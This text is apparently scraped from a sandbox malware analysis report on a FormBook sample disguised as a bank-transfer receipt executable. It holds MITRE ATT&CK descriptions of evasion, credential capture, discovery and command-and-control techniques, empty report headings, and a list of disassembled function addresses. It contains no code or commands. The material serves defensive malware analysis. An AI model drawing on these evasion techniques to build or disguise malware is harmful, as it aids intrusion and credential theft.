Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

Function 00F31910, Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 290
memoryCOMMON

Function 00F34E80, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 121
windowCOMMON

Function 00F35849, Relevance: 19.7, APIs: 13, Instructions: 211
windowCOMMON

Function 00F32DAE, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 121
libraryfileloaderCOMMON

Function 00F3532F, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 101
COMMON

Function 00F321E7, Relevance: 12.1, APIs: 8, Instructions: 93
filestringCOMMON

Function 00F33E45, Relevance: 10.6, APIs: 7, Instructions: 97
processsynchronizationwindowCOMMON

Function 00F32A7E, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 64
libraryloaderCOMMON

Function 00F35165, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64
libraryCOMMON

Function 00F37360, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 00F31E6B, Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 185
registrylibrarymemoryCOMMON

Function 00F339F1, Relevance: 40.6, APIs: 11, Strings: 12, Instructions: 311
libraryloaderCOMMON

Function 00F35467, Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 248
memorystringCOMMON

Function 00F35253, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 72
fileCOMMON

Function 00F323CE, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 73
registryCOMMON

Function 00F369D0, Relevance: 13.6, APIs: 9, Instructions: 137
sleepCOMMON

Function 00F3578F, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74
memoryfileCOMMON

Function 00F3508F, Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74
memoryCOMMON

Function 00F31E1D, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23
registryCOMMON

Function 00F34BE0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 105
COMMON

Function 00F34B3C, Relevance: 4.5, APIs: 3, Instructions: 37
timeCOMMON

Function 00F3475B, Relevance: 3.1, APIs: 2, Instructions: 56
fileCOMMON

Function 00F349C0, Relevance: 3.0, APIs: 2, Instructions: 47
fileCOMMON

Function 00F364E7, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Function 00F360D0, Relevance: 1.5, APIs: 1, Instructions: 35
COMMON

Function 00F34A60, Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Function 00F364C8, Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Function 00F34BA0, Relevance: 1.3, APIs: 1, Instructions: 8
memoryCOMMON

Function 00F34BC0, Relevance: 1.3, APIs: 1, Instructions: 7
COMMON

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre